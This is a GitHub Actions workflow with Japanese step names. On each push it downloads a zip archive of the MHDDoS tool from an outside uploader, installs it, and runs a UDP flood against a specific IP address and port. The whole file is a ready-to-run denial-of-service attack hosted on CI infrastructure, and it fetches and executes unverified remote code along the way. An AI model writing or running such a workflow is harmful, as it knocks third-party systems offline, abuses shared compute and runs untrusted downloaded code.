name: TEST

on:
  push:
  workflow_dispatch:

jobs:

  build:


    runs-on: ubuntu-latest


    steps:

    - name: ダウンロード

      run: wget http://nkgpgc.sx3.jp/uploader51/upl/QIhNCh_NI7AwbPt2oQHO/01430.zip

    - name: 展開

      run: unzip 01430.zip -d ./

    - name: コピー

      run: cp -R ./MHDDoS-2.4.2/* ./

    - name: インストール

      run: pip3 install -r requirements.txt

    - name: 実行

      run: python3 start.py UDP 133.203.81.47:52898 500 10
